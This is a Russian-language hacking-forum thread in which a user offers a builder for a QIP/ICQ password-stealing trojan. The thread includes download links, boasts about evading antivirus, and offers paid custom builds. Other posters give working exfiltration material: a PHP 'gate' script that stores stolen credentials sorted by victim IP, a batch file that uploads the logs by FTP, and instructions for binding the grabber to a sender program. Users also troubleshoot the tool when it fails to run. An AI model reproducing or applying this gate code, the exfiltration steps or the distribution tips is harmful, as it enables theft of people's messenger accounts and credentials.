QIP Password Grabber Builder By ICQ Hools

http://icqhools.in/images/qis.jpg

таки решился выложить...

для всех несекрет что qip хранит пароль в памяти в открытом виде когда вы онлайн

У программы есть свои преимущества:
+ размер запакованного файла всего 33кб
+ результат приходит моментально после запуска
+ вытаскивает пароль таже если жертва не сохраняет его
+ работает на любой версии qip втч последней 8050
+ на данный момент не палится антивирусами - _http://www.virustotal.com/ru/analisis/e039ecd49a0219e376e4da6eb7cd50c6
файл сам не пакуется, пакуйте чем хотите =))

И минусы:
- Удобно работать можно только в случае если у вас внешний(реальный) ip адрес
- У вас должна быть открыта папка на запись
- при запуске 1 раз маргнёт черное окошко )
впринципе минусы можно исключить если есть дед...

Скачать (http://icqhools.in/QPG.rar)
Скачать QPG.rar с WebFile.RU (http://webfile.ru/1866927)
отпишитесь по делу и поставьте + кому не жалко ;)

чОта я очкую качать :)

чОта я очкую качать :)
Да ты успокооойся.... Че ты очкуешь???

CrazyStudentS_Mi}{, очкуешь? пиши сам... основной код можешь найти в сети

чОта я очкую качать :)
йо тож))

Регистрация: 31.03.2008

перезалейте плиз...ссылка не фурычит

Ch1//0ut,обновил первый пост, залил на webfile, но первая ссылка пашет...

буду испытателем )

Подобный софт давно есть в сети.Так что велосипеда ты не придумал.

Не запускаеццо(((

"Приложение не было запущено, поскольку оно некорректно настроено. Повторная установка приложения может решить данную проблему."

((((((

впринципе минусы можно исключить если есть дед...
А если у меня нет дедушки можно как то по другому решить проблему?

спасибо за плюсы ;)

n0153r, я нигде не писал что я придумал что-то новое сверхъестественное, просто в паблике готового для работы приложения не было. Может быть разработчики квип всё-таки задумаются и больше не будут хранить пароль в памяти, это будет неудобно но надежно.

beerhack, билд не запускается или билдер? Еcли что то вот билд - http://icqhools.in/qpg(exe).rar ищите строчку //127.0.0.1/folder/1.txt

Shawnix+++,А если у меня нет дедушки можно как то по другому решить проблему?

реальный (внешний) ip адрес

сам билдер не запускается

Чёт я туплю А как им пользоваться???

Chrek625,
отправка отчетов происходит на компьютер который виден из внешней сети т.е протокол ftp не подреживается!
Более того должна быть открыта папка для записи. Отчет приходит успешным только в том случае если на момент запуска был включен qip.
Когда билдер запускаешь... над строкой ввода написан яркий пример.
если не понятно постучи лучше в аську.

у меня пишет такую ошибку
http://images.i-files.org/uploads/d2d37387861692499ce70c84619b3106/err.jpg
скрин

Не питасаите :)
парень хороший,хотя мне тоже стремно:)

я пробовал на другом компьютере где стоит виста, там всё работает и билд и билдер
-------------------------------------------------------------------
у кого вылезает http://images.i-files.org/uploads/d2d37387861692499ce70c84619b3106/err.jpg
вот такая ошибка - значит неправильно указываете путь, для проверки укажите c:/file.txt

отпишитесь кому помогло ;)

проблему с запуском билдера буду решать...

ашипка...
у меня xp sp2

GroW, ошибка чего? ошибка какая?
если не читал тему то прочти пост №18 - должно помочь

Спс софт очень помог

херня... Вроде всё сделал правильно, лог пришел, а в нём текст вида "О( О(" и эт че хня?

посмотрел я эту поделку, улыбнул хвост файла)))
вот люди курсовики делают, ага!
D:\МАИ\4 семестр\Выч.мат. мой курсач\qpr\Debug\qpr.pdb
по поводу размера - много лишнего, переделать по человечески чтоль

херня... Вроде всё сделал правильно, лог пришел, а в нём текст вида "О( О(" и эт че хня?
клиент не включен или это не qip, на qip infium не работает, работает только на обычном
neprovad, я сам ток потмо заметил )) это стёб, к вычмату никакого отношения не имеею, просто забыл семнить дирректорию ))
по поводу размера - много лишнего, переделать по человечески чтоль
упакуй, будет ~33кб


кому нужна отправка на фтп стучите в аську сделаю билд за 2$, лучше мне чем провайдеру каждый месяц )))
вес упакованного файла стал 81.5
можно еще уменьшить чуть-чуть, просто мне впадлу :)
возможно добавление некоторых функций типа: RAS, &RQ, The BAT )))

на данный момент палится:
Результат: 6/32 (18.75%)

DrWeb 4.44.0.09170 2008.04.19 Trojan.PWS.LDPinch.1941
eSafe 7.0.15.0 2008.04.17 suspicious Trojan/Worm
F-Secure 6.70.13260.0 2008.04.19 Suspicious:W32/Malware!Gemini
Ikarus T3.1.1.26 2008.04.19 Packer.Malware.FriCryptor.B
NOD32v2 3040 2008.04.19 unpack error
Sophos 4.28.0 2008.04.19 Sus/UnkPacker

качать не буду,доверия нету.

m9chik, тебя никто не заставляет, исходники основного кода лежат в сети

Делаем отправку отчетов на фтп (для чайников)

Из-за неособой актуальности сего чуда расскажу как сделать для себя отправку на фтп:

1) делаем билд QPG, путь укажем например C:/file.xxx
2) берем исходник известного qip history sender'a, в нём заменяем "_srvlog.txt" на "boot.ini",
а ".txt" меняем на наше ".xxx", вместо "C:\Program Files\QIP\" пишем "C:\", не забудем вписать
ваш хост и путь до гейта, компилим. Эта программа будет слать отчет на фтп через гейт.
3) клеем 2 файла: сначала выбираем QPG Билд, потом берем переделанный нами history sender под отправку
наших отчетов. Клеем.
4) размер получается очень большой => жмём и пользуемся

что получается? Сначала создаётся наш отчет с нераспространённым расширением на диске "С" для удобного его поиска,
далее он отправляется к нам на фтп, но не удаляется у жертвы.

здесь написан лишь только самый простой пример как незная программирования осуществить отправку на фтп.
Извиняюсь если кого насмешил, но я сам смеялся =))

Всем удачки, отпишитесь у кого работает и не работает если нетрудно, желаю удачи ;)

Это не из памяти, а из дочернего окна главного окна аси.

В любом случае квип можно выкинуть в помойку

качать не буду,доверия нету.
Зачем доверие? Файрволл рулит и запускаешь :p
есть много прог для мониторинга изменений при запуске приложений (по умному не получаеться сказать :D )

Зачем доверие? Файервол рулит и запускаешь :p
есть много прог для мониторинга изменений при запуске приложений (по умному не получаеться сказать :D )
ну не все программы для защиты от вредоносного ПО могут всё отследить. видел я червей который на вопросы файервола умудрялся отвечать вместо пользователя)

во во

Nickotin, очень содержательный пост...
давайте не будем флудь пишите по делу:
работает, не работает, предложения и пожелания или кто чем может помочь,
может кто хочет присоединиться...

норм прога, пашет

QPG Builder (ftp version)

Для чаников,ленивых, тем кому не помог FAQ а также для удобства:

На скорую руку был сделан билдер.

+размер билда уменьшен до 77кб
+добавлена новая функция &RQ

- палится антивирусами

Cкачать (http://icqhools.in/QPGB.rar)

ICQ Hool у мню QPG Builder (ftp version) не хотит запускаться на компе

Black dead, лови тогда билд, ищи 1___ и 2____
1___ это "твой сайт.ру"
2___ это путь до гейта например /gate/gate.php
Скачать file.exe с WebFile.RU (http://webfile.ru/1911705)

хм... не пойму, почему на хосте создается папка с Ipшником, а в нее ничего не приходит???

не пойму, почему на хосте создается папка с Ipшником это зависит от того какой гейт ты используешь...
а в нее ничего не приходит??? а вот с таким я не сталкивался, но на 99% уверен что это виста ;)

а вот с таким я не сталкивался, но на 99% уверен что это виста
нее Xp ;)

ой заметил касяк что в отчете приходит второй строчкой надпись "пароль от" =)
а должно быть "пароль от &rq не найден" )) просто "&" вывод обрезала чтоли...
это касяк пустяковый но глаза всеравно режет

на днях додумаю чтобы с вистой касяка не было

ой заметил касяк что в отчете приходит второй строчкой надпись "пароль от" =)
а должно быть "пароль от &rq не найден" )) просто "&" вывод обрезала чтоли...
это касяк пустяковый но глаза всеравно режет

на днях додумаю чтобы с вистой касяка не было
To ICQHool Каким хостом пользуешься? Может быть у меня проблема из-за хоста...

GoldLIke, боюсь что это не из-за хоста...
мне вчера пришел один отчет просто пустая папка, другой просто лог пустой.
я пользуюсь jino-net.ru

Можно уменьшить размер в 2 раза сделав более упрощенную отправку на фтп без гейта.

1) делаем билд QPG, путь укажем например C:/file.xxx

2) создаем bat файл и пишем

ftp -s:имя_нашего файла.bat

open фтп
логин
пароль
cd /дирректория_на_фтп/
lcd C:\
put file.xxx
quit q


3) клеем 2 файла: сначала выбираем QPG Билд, потом батник, клеем.

я еще не пробовал но поидее должно сработать, если не получится то надо будет что-нибудь с задержкой в батнике придумать.

еще я думаю можно будет доработать батник чтобы отчеты каждый раз дописывались в файл...

ой ой нет это плохая идея... батник не будет работать в склейке
перегнал батник в ехе, размер получился 64кб вместо 1кб (((

чтобы поставить задержку можно воспользоваться пингом ))
ping -n 2 127.0.0.1 > NUL
2 - это задержка в секундах

я идиот, тут дело не в расширении, эт не получится так =((

Сор за мой тупизм... Но я так и не понял как с ним работать:) Подскажите плиз... (желательно подробно)

mrTUZ, на отправку на фтп без гейта не обращаем внимания, это были глупые мысли вслух...

качай билдер http://icqhools.in/QPGB.rar
бери гейт например такой:
<?
$ip=getenv("REMOTE_ADDR");
$filename=$_POST['fname'];
$UIN=$_POST['UIN'];
$text = $_POST['data'];
@mkdir($ip);
@chdir($ip);
$fp = fopen("log_".$UIN."_".$filename.".txt", 'w');
fwrite($fp, $text);
fclose($fp);
?>
в нём есть дыра но он хорош в том плане что отчет с каждого нового ip кладётся в новую папку

вообще лучше в аську стучи или еще лучше прочитай тему от начала до конца, всё доступно написано

Uin - (sem ) <:hidden:>
мне таое пишет((((

а скажите почему я када проверяю на себе пишет Hidden ну чет в этом роде ?

таже самая фигня :( <:hidden:>

ya_mag, aciiD, 7on
hidden пишет если пароль сохранен под звездочками, он не хранится в этом окне

ну а чё ж зделать надо чтоб не писалось хиден?

Что значит " <:hidden:> " ?

Скрытый. Значит, что пароль скрыт.

Где исходники программы? =\

t04, вот тема - icqhools.in (http://www.icqhools.in/forum/index.php?showtopic=4),
там найдёшь основные коды как на Си так и на делфи

у меня Не запускаеццо

"Приложение не было запущено, поскольку оно некорректно настроено. Повторная установка приложения может решить данную проблему." :confused: :(

Что значит следущее... На фтп создаецца фаил log1___.txt ну не важно какое у него имя, лог короч, открываю его- пустой. И ещё, какого хера трояны дропперы появляются в Local\Temp и не удаляются после завершения работы, приходится в деспечере проц. снимать и удалять в ручную.

кста вот новенький грабер с фтп:
http://rapidshare.com/files/122034126/QPGB.rar

t04, вот тема - icqhools.in (http://www.icqhools.in/forum/index.php?showtopic=4),
там найдёшь основные коды как на Си так и на делфи

в коде есть уязвимые места..например это
"hManForm := FindWindow('TManForm', 'QIP - Спокойное общение!');"
другой скин..и пахате не будет...:(

Создаём значит на бесплатном хостинге сайт с поддержкой php.
Льём туда gate.php с кодом

<?
$ip=getenv("REMOTE_ADDR");
$filename=$_POST['fname'];
$UIN=$_POST['UIN'];
$text = $_POST['data'];
@mkdir($ip);
@chdir($ip);
$fp = fopen("log_".$UIN."_".$filename.".txt", 'w');
fwrite($fp, $text);
fclose($fp);
?>


Запускаем QPG Builder...Пишем адрес сайта который запломбировали и путь к gate.php.

что дальше?

Аська должна быть запущенна, не понимаю основной смысл работы проги. :)

Аська должна быть запущенна, не понимаю основной смысл работы проги.

аська жертвы должна быть запущена...

bublebuble, а чем он от моего отличается?

а чем он от моего отличается?
названием

прошу модератора закрыть тему в связи с неактуальностью программы и претензией ко мне в орбитражный суд webmoney
зы. тему читал об этих претензиях, в любом случае мне не нужны неприятности...

перезалейте. ссылки не пашут

ТС попросил закрытия темы , думаю врятли тебе кто то будет перезаливать